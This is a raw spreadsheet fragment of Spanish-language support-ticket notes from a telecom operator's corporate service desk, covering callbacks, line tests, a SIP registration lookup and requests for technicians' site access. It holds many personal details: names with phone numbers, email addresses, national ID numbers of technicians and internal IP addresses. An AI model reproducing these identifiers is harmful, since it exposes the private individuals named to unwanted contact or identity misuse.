    <t>EVELYN SALAZAR-76769577  ##SE LLAMA A CLIENTE- INDICA QUE EN ESTE MOMENTO TIENE PROBLEMAS ##SE COLOCA TRAZADOSR- SE OBSERVA QUE PBX SI SE ESTA REGISTRANDO - SE REALIZAN TRAZAS DE PRUEBA-
&lt;LACUSVZWN1D1EID1&gt;PING -C 1500 -S 1500 -M 30  -VPN-INSTANCE  IP_PBX 10.165.196.101
  --- 10.165.196.101 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/20 MS
&lt;LACUSVZWN1D1EID1&gt;
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50322396900";
SMEJSVZ4_ZACAMIL_CSCF
+++    CSCF/*MEID:5 MENAME:SMEJSVZ4_ZACAMIL_CSCF*/        2022-06-01 14:52:41-06:00
O&amp;M    #892569
%%/*1879205335 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50322396900";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50322396900@IMS.CLARO.COM.SV
                      IMPU  =  TEL:+50322396900
                SCU NUMBER  =  107
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  3600
             RESIDUAL TIME  =  2038
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@ZMLSCSCF01.IMS.CLARO.COM.SV;LR;DPT=7BE4_89189246;CA=119C&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50322396900@10.189.90.1:37148;TRANSPORT=UDP;HPT=8E82_16;SSN;SRTI=S0_0;ANN=SBC_ZACAMIL_2900&gt;;Q=1.0
         ACCESS NETWORK ID  =  7
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  GRANDSTREAM UCM6301V1.2C 1.0.13
       ORIGINAL IP ADDRESS  =  10.189.90.1
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>""SE LALAMA A CLIENTE E EVELYN SALAZAR-76769577 ## 2 VECES ##ENVIA A BUZON ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 QUIEN SOLICITA CORREO CON LAS PRUEBAS DONDE EL PROBLEMA SEA DE LA PLANTA PARA PODER ESCALARLO CON EL PROVEEDOR --  EVELYN.SALAZAR@SLI.COM.SV ---
- LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLLAMA A CLIENTE EVELYN SALAZAR-76769577  NO RESPONDE, SE INTENTARA LUEGO **
ID 3001625372
**</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS Y TODO OK- ##INDICA QUE HA REALIZARA MAS  PRUEBAS Y SE LE CONTACTE EN 1 HORA ##
RESULTADO: LLAMADA HECHA
NOMBRE: 23894747
NÚMERO: 23894747
INICIO: HOY, 10:28
FIN: HOY, 10:28
DURACIÓN: 0:01
ID DE LLAMADA: 3001587655</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 SE TENIA EN LINEA A CLIENTE PERO LA LLAMADA PRESENTO PROBLEMA, SE INTENTO VOLVER A LLAMAR PERO NO SE TIENE RESPUESTA
-ID 3001855648 - 3001856303 - 3001858261 - 3001857768</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE EVELYN SALAZAR-76769577 SE TIENE EN LINEA ##
3001583234
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/06/2022 10:16:41</t>
  </si>
  <si>
    <t>##SEGUIMIENTO 11AAM</t>
  </si>
  <si>
    <t>F4585878</t>
  </si>
  <si>
    <t>SE REGISTRA NUEVO REINICIO EN CPE SE LLAMO A CONTACTO WILLIAM SICAN SIN EMBARGO NO TIENE TONO LA LLAMADA. SE LLAMO A CARLOS VALLADARES PARA QUE PROPORCIONE OTRO CONTACTO SIN EMBARGO NO SE TIENE RESPUESTA.
NODE DETAILS - CC_IJSUD_GT_PARAISO_1
NODE STATUS 	REACHABLE
SYSTEM NAME 	CC_IJSUD_GT_PARAISO_1
IP ADDRESS 	10.212.147.192
COUNTRY 	GUATEMALA
PROPERTY 	CUSTOMER
GROUP 	CC_IJSUD_VIP
CUSTOMER 	
LOCATION 	GUATEMALA
BUSINESS SERVICE 	
SERVICE STATUS 	PRODUCTION
TYPE 	ROUTER
MODEL 	CISCOROUTER
UPTIME 	0:05:47
CONTACTO || CARLOS VALLADARES
RESULTADO: LLAMADA HECHA
NOMBRE: 42459472
NÚMERO: 42459472
INICIO: HOY, 14:35
FIN: HOY, 14:35
DURACIÓN: 0:12
ID DE LLAMADA: 1001132756
RESULTADO: LLAMADA HECHA
NOMBRE: 30052590
NÚMERO: 55280199
INICIO: HOY, 14:41
FIN: HOY, 14:42
DURACIÓN: 0:31
ID DE LLAMADA: 1001134411</t>
  </si>
  <si>
    <t>F4585888</t>
  </si>
  <si>
    <t>SE VALIDA QUE NUEVAMENTE NO TIENE MOVIMIENTO LA FALLA SE PROCEDE A ESCALAR CON  SE ESCALA CASO CON ANGEL CLAVEL AL 41288986 ID 3001702146 SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE LE BRINDARA EL SEGUIMIENTO SE MUEVE A WIP</t>
  </si>
  <si>
    <t>F4585898</t>
  </si>
  <si>
    <t>**SE LLAMAA A CLIENTE A PR 79539903 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001626740
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 79539903 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 3001735809</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001665395
**</t>
  </si>
  <si>
    <t>**SE LLAMAA A CLIENTE A PR 79539903 NO RESPONDE ||DA TONO DE OCUPADO SE INTENTARA LUEGO **
ID 3001665288
**</t>
  </si>
  <si>
    <t>**SE LLAMAA A CLIENTE A PR 79539903 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001644218
**</t>
  </si>
  <si>
    <t>F4585917</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 17:28
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; ORLANDO RODRIGUEZ &lt;ORLANDO.RODRIGUEZ@ARIASLAW.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: GRAFICAS
*-*-*-*</t>
  </si>
  <si>
    <t>F4585918</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 11:49
PARA: JUAN.PLEITEZ@PROMERICA.COM.SV &lt;JUAN.PLEITEZ@PROMERICA.COM.SV&gt;; WCRUZ@PROMERICA.COM.SV &lt;WCRUZ@PROMERICA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERSMISOS || BANCO PROMERICA, S.A. || IP2328001
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
SV10701      HECTOR IVAN URQUILLA VASQUEZ          04339969-2
SV10805      MANUEL GARCIA            00815933-2
SV10807       JOSE LUIS RODRIGUEZ            03236741-2
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, PARA HOY MIÉRCOLES 1/06 A LAS 15:00 HORAS Y AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WELMER CRUZ 71604055 QUIEN SOLICITA LOS DATOS DE PERSONAL TECNICO POR CORREO
JUAN.PLEITEZ@PROMERICA.COM.SV - WCRUZ@PROMERICA.COM.SV
-ID 3001614212</t>
  </si>
  <si>
    <t>F4585922</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO RETOMAN LLAMADA SE INTENTARA LUEGO **
ID 3001631809
**</t>
  </si>
  <si>
    <t>F4585952</t>
  </si>
  <si>
    <t>CON CLIENTE ENL INEA. INDICA QUE LAS LLAMADAS NO ESTAN ENTRANDO A SUC ONMUTADOR, PERO  SI TIENE LLAMADAS SALIENTES - SE REALIZAN PRUEBAS Y SE DETECTA QUE AL LLAMAR ALGDN SI SUENA LA LLAMADA PERO DEL OTRO LADO DE LA LINEA NO SUENA EL TELEFONO ##CLIENTE EESCALA A SU PROVEEDOR DE PBX ##VALIDA CIERRE## + SE USO VIVO
3001611025
COLA:
NOMBRE: A: 0050323091400
NÚMERO: 0050323091400
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050323091400
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/06/2022 11:30:53</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FLOR DE MARÍA-72131366 NO CONSTESTA- SE LLAMO DESDE CIC +  VIVO
3001609025
COLA:
NOMBRE: A: 0050372131366
NÚMERO: 0050372131366
DURACIÓN: 0:00:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050372131366
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/06/2022 11:25:28</t>
  </si>
  <si>
    <t>F4585958</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SILVIA COMA AL 55118373 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001632918
**</t>
  </si>
  <si>
    <t>F4585961</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 98542438  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001635533
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 98542438  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001643682
**</t>
  </si>
  <si>
    <t>F4585968</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 9:55
PARA: YOSELIN DAYRIELA MONTES MUNGUIA &lt;YOSELIN.MONTES@HN.ASESOREXTERNOCA.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: G-NOC HON &lt;NOC@BACCREDOMATIC.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE AFECTADO - AGENCIA INTERNET MERAKI AG ESTE SPS
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
JOHN RAMOS     0501-1995-07643
HUGO PINEDA    0501-2000-09002
ORLIN FUENTES  1618-1986-00852
OSCAR PAZ           0501-2000-11392
LUIS AMAYA         0501-2001-01539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585979</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL ROLAELIETH /57539570 NO RESPONDE ENVIA A BUZON | SE INTENTARA LUEGO **
ID 3001620211
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGELO CALDERA AL 89661010 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001620511
**</t>
  </si>
  <si>
    <t>F4585984</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 32415373 NO RESPONDE SE INTENTARA LUEGO **
ID 3001636876
**</t>
  </si>
  <si>
    <t>F4585985</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE ARELY ALARCON E INDICA QUE EL DESVIO DEL NUMERO 22633110 AL GDN: 22618800 LO HAN TENIDO DESDE SIEMPRE PERO AHORA NO LES FUNCIONA, INDICA QUE CAMBIARON DE PBX PERO EL PROVEEDOR DE SERVICIOS LE DIJO QUE TODO ESTÁ FUNCIONANDO BIEN.</t>
  </si>
  <si>
    <t>SE EXPLICA AL CLIENTE SEÑORITA ALARCÓN, INDICA QUE ELLA FACTURA POR EL 22633110, SE LE INDICA QUE DE LADO DE CLARO ESTA CATALOGADA ESTA LINEA COMO UNA LINEA ANALOGA, NO COMO UN DESVIO PLUS, SE LE SOLICITA EL CONTACTO DE SU EJECUTIVO DE CUENTA, CLIENTE DEJA EN ESPERA.
3001658343
COLA:
NOMBRE: A: 0050376823959
NÚMERO: 0050376823959
DURACIÓN: 0:00:58
ESTADO: CONECTADA
DETALLES: 0050376823959
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 1/06/2022 13:55:53</t>
  </si>
  <si>
    <t>F4585986</t>
  </si>
  <si>
    <t>SE LLAMA A ERICK QUIEN VERIFICA QUE ALCANZAN EL ANCHO DE BANDA CONTRATADO COMENTA QUE ESTAN REALIZANDO PRUEBAS, HOY, MAÑANA Y VALIDARAN HASTA EL SABADO A LAS 10:00 AM--- CLIENTE SOLICITA LLAMADA A ESA HORA YA QUE TENDRA CAPACITACION DURANTE LA MAÑANA E INDICA QUE A ESA HORA TENDRA UN RECESO-</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CLIENTE ERICK SIN EMBARGO NO RESPONDE---
70283268</t>
  </si>
  <si>
    <t>SE LLAMA A CL PARA SEGUIMIENTO PERO NO SE COMPLETA LLAMADA-
70283268</t>
  </si>
  <si>
    <t>F4585991</t>
  </si>
  <si>
    <t>###SE REALIZA PRUEBAS EN CONJUNTO CON EL CLIENTE CON SU RED LAN , TECNICO CONECTA SU PC Y LA DEL CLIENTE DIRECTAMENTE AL CISCO SE VERIFICA A NIVEL DE CLARO TODO OK##
SE VALIDA EN LLAMADA CON TECNICO OPICO CASTILLO QUE INCONVENIENTES CON SW DE LA LAN DEL CLIENTE.  FERNIN RIVAS  VALIDA QUE ENLACE OPERATIVO Y SIN PERDIDAS. SE PROCEDE A CIERRE DE TICKET
1001014625
COLA:
NOMBRE: A: 50378696958
NÚMERO: 50378696958
DURACIÓN: 0:35:03
ESTADO: CONECTADA
DETALLES: 50378696958
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 3/06/2022 09:01:09</t>
  </si>
  <si>
    <t>F4586025</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINORA REYES 78627679 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001633874</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DINORA AL 78627679 INDICA QUE POR EL MOMENTO TIENEN YA LOS EQUIPOS CONECTADOS AL  UPS SIN EMBARGO HAN HABIDO CAIDAS DE INTERNET ||SE CONTACTA CON GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001860165
**</t>
  </si>
  <si>
    <t>CLIENTE DINORA REYES 78627679  SE LE INFORMA QUE EL ROUTER DE CLARO YA NO SE REINICIA, UNICAMENTE SE TIENE CAIDAS EN LA INTERFACE QUE CONECTA HACIA SU LAN HOY DESDE LAS 8:30 AM, SE LE SOLICITO REVISAR QUE SUS EQUIPOS LAN ESTEN CONECTADOS AL UPS QUE INSTALARON, INFORMA QUE REVISARA SUS EQUIPOS LAN PERO QUE NO CERREMOS EL INCIDENTE PARA VALIDAR MAÑANA EN EL TRANSCURSO DE LA MAÑANA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINORA REYES 78627679 INDICA QUE PERSISTE EL INCONVENIENTE || SE DEJA EN LINEA CON GESTOR **
-ID 3001662939
**</t>
  </si>
  <si>
    <t>F4586026</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOE YAX 41642065 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 3001636383</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINDY ARIAS F4584751 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001636858</t>
  </si>
  <si>
    <t>F4586029</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIC. ROBERTO GUERRA AL 3279-6076 || SE CONTACTA A GESTOR Y SE DEJA EN LIENA CON CLIENTE **
ID 3001634312
**</t>
  </si>
  <si>
    <t>SE LLAMA A ROBERTO QUIEN INDICA QUE SE LLAME MAÑANA A LAS 11:00 AM INDICA QUE ESTA EN REUNION Y LA PERSONA ENCARGADA ESTA VALIDANDO CONFIG EN IMPRESORAS. POR LO QUE SOLICITA SE LLAME A ESA HORA PARA VALIDAR SERVICIO-</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE:
RE: ESCALONAMIENTO GEO STRUCTURES S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4586031</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HELEN TELLEZ 82406670 MENCIONA QUE YA TODO ESTA FUNCONANDO CORREECTAMENTE
-ID 3001737185</t>
  </si>
  <si>
    <t>F4586039</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE MIGUEL GIL 77866494  QUIEN COMENTA QUE EL DIA DE AYER SE LLEGÓ A CORREGIR EL SERVICIO PERO EL DÍA DE HOY INDICA QUE NO LOGRA SACAR NI RECIBIR LLAMADAS, SE LE INDICA AL CLIENTE QUE AL LLAMAR COMPLETA LA LLAMADA PERO NADIE RESPONDE, POR LO QUE SE LE SOLICITA AL CLIENTE UBICAR Y REINICIAR EQUIPOS PERO CLIENTE MOLESTO INDICA QUE NO APOYARÁ Y QUE DEBE IR PERSONAL TÉCNICO A REVISAR. ATIENDEN HASTA LAS 6 PM SE ABRIRÁ WO.
ID DE LLAMADA: 3001630061</t>
  </si>
  <si>
    <t>F4586041</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY GRACIA 57839912 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001782325</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. HENRY GRACIA 57839912 INFORMA QUE LA CONEXION ES MUY LENTA, YA VALIDO LOS EQUIPOS Y CONXIONES, APLICO REINICIO, PERO CONTINUA LA INESTABILIDAD. SE LE INFORMA QUE SE CORREGIRA LA ATENCUACION EN LA FO, SOLICITA ANTES DE QUE PERSONAL TECNICO SE RETIRE VALIDAR CON SU PERSONA YA QUE REALIZARA PREEBAS DE VELICIDAD.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY GRACIA 57839912 INDICA QUE SI LEVANTO EL SERVICIO PERO QUE SE VOLVIO A  CAER TECNICO AUN REVISANDO INDICA **
ID 3001698156
**</t>
  </si>
  <si>
    <t>SE ESCALÓ CON DANIEL MONTENEGRO/TÉCNICO 58263684 INDICA QUE ÉL SE DIRIGE AL NODO Y DANIEL GÓMEZ/TÉCNICO A CLIENTE, YA VAN ENTRANDO A VILLA NUEVA, ESTIMA QUE ÉSTE ÚLTIMO ESTÉ EN CLIENTE EN 35 MINUTOS.
ADICIONAL A LO DICHO EN CRONO ANTERIOR, SE BRINDAN AVANCES DEL TICKET A HENRY GARCÍA/CLIENTE, ÉSTE SE RETIRA A LAS 17:30 HORAS.</t>
  </si>
  <si>
    <t>F4586053</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR
RE: ENLACES DOWN ANTIGUA BAC/BAM</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL CLIENTE YA RESPONDIÓ A LA COLA DE CORREOS Y CONFIRMA EL SERVICIO OPERATIVO SOLICITA MONITOREO  SE GENERA LA NUEVA FALLA F4586261 FALLA ANTERIOR F4586053
DE: JERSON GUTIERREZ [MAILTO:JGUTIERREZ@QUATTRO.COM.GT]
ENVIADO EL: MIÉRCOLES, 1 DE JUNIO DE 2022 13:21
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ALEJANDRO CANEL &lt;ACANEL@QUATTRO.COM.GT&gt;
CC: MISSION CONTROL &lt;MISSIONCONTROL@QUATTRO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACES DOWN ANTIGUA BAC/BAM
GRACIAS POR LA INFORMACIÓN, LE COMENTO QUE YA SE OBSERVA OPERATIVO EL SERVICIO, FAVOR DE MANTENER EN MONITOREO EL ENLACE POR UNAS 3 HRS MAS.
SALUDOS</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO Y ESTABLE.. SE VALIDARA CON CLIENTE-</t>
  </si>
  <si>
    <t>F4586054</t>
  </si>
  <si>
    <t>SE VALIDA QUE A NIVEL DE CLARO YA ESTA OPERATIVO Y ESTABLE POR TAL RAZÓN SE PROCEDE A VALIDAR OTROS CONTACTOS EN OTROS TICKET YA QUE ACTUALMENTE NO POSEE REGISTRO  DE ALGUNO SOLO CORREO, SE VALIDA EL NUMERO 22024080 ID 3001691407 ATIENDE GERSON Y SE LE CONSULTA SI LO PUEDE VALIDAR Y COMENTA QUE SI, SE LE BRINDA LA INFORMACIÓN Y CONFIRMA EL SERVICIO ESTABLE Y AUTORIZA EL CIERRE DEL TICKET. SE NOTIFICA VIA SKYPE AL GESTOR  WAGNER.POLANCO</t>
  </si>
  <si>
    <t>F4586062</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO PEREZ AL 46630375 || SE CONTACTA A CLIENTE Y SE DEJA EN LINEA
CON GESTOR **
ID 3001690324
**</t>
  </si>
  <si>
    <t>F4586063</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE CARMEN ISABEL  52048968 MENCIONA QUE SE ENCUENTRA OCUPADA Y NO PUEDE ATENDER POR LO QUE SOLICITA LLAMADA A LAS 16:00 HRS
-ID 3001643634</t>
  </si>
  <si>
    <t>F4586065</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 15:33
PARA: JAVIER.MEDRANO@GRUPOTSK.COM &lt;JAVIER.MEDRANO@GRUPOTSK.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: IP2105220SV | CAPELLA SOLAR TSK GENSUN EL SALVADOR S.A. DE C.V. | SD1131184
BUENOS DÍAS, JAVIER.
ADJUNTO PRUEBAS REALIZADAS, CONFORME LLAMADA TELEFÓNICA.
ARP EN SERVICIO CON IP2105220
CONEXIÓN LAN  HACIA LAN
SE ALCANZA LA EL EQUIPO CON IP  192.168.32.3 EN IP2024367, DESDE ID  IP2105220
ARP EN SERVICIO CON IP2024367
SE ALCANZA EQUIPO CON IP 192.168.31.102 EN IP2105220, DESDE SERVICIO CON IP2024367
QUEDAREMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 17:37
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; JAVIER.MEDRANO@GRUPOTSK.COM &lt;JAVIER.MEDRANO@GRUPOTSK.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: IP2105220SV | CAPELLA SOLAR TSK GENSUN EL SALVADOR S.A. DE C.V. | SD1131184
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA REALIZANDO PRUEBAS
3001640410
COLA:
NOMBRE: A: 0050378542115
NÚMERO: 0050378542115
DURACIÓN: 0:10:32
ESTADO: CONECTADA
DETALLES: 0050378542115
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 1/06/2022 13:05:31</t>
  </si>
  <si>
    <t>SE REALIZARON PRUEBAS CON CLIENTE, JAVIER MEDRANO, SOLICITA CORREO JAVIER.MEDRANO@GRUPOTSK.COM CON LAS PRUEBAS REALIZADAS E INDICA QUE POR EL MISMO MEDIO ESTARA CONFIRMANDO CIERRE DE CASO.
3001640410
COLA:
NOMBRE: A: 0050378542115
NÚMERO: 0050378542115
DURACIÓN: 0:40:43
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050378542115
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 1/06/2022 13:36:19</t>
  </si>
  <si>
    <t>F4586074</t>
  </si>
  <si>
    <t>SE HABLÓ CON GERARDO GÓMEZ/CLIENTE 30500184 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET, CABE HACER MENCIÓN QUE NO CONTABA CON ENERGÍA ELÉCTRICA, ESTABAN CON MG</t>
  </si>
  <si>
    <t>F4586097</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDOS LOS PERMISOS DE INGRESO APRA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // QUEDAMOS A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 16:02
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; DAVID NOEL BARAHONA ESCOTO &lt;DAVID.BARAHONA@INVILP.COM&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: REDES Y COMUNICACIONES &lt;REDESYCOMUNICACIONES@INVILP.COM&gt;
ASUNTO: RE: ENLACE MOTOMUNDO CLARO-PPL-MM-CATACAMAS-ID-1641352
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  BARRIO LA MORA, 4ª CALLE ENTRE 2ª Y 3ª AVENIDA N.O. A MEDIA CUADRA DEL MERCADO CENTRAL (CONTIGUO A AGRO COMERCIAL OLANCHO)
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS:
DANIEL EDGARDO ZELAYA                            0801.1976.13407
FIDEL ARMANDO ALVARADO SOLIS            1501.1993.02808
NUSLY GABRIELA MONTES CERNA              1501.1998.00272
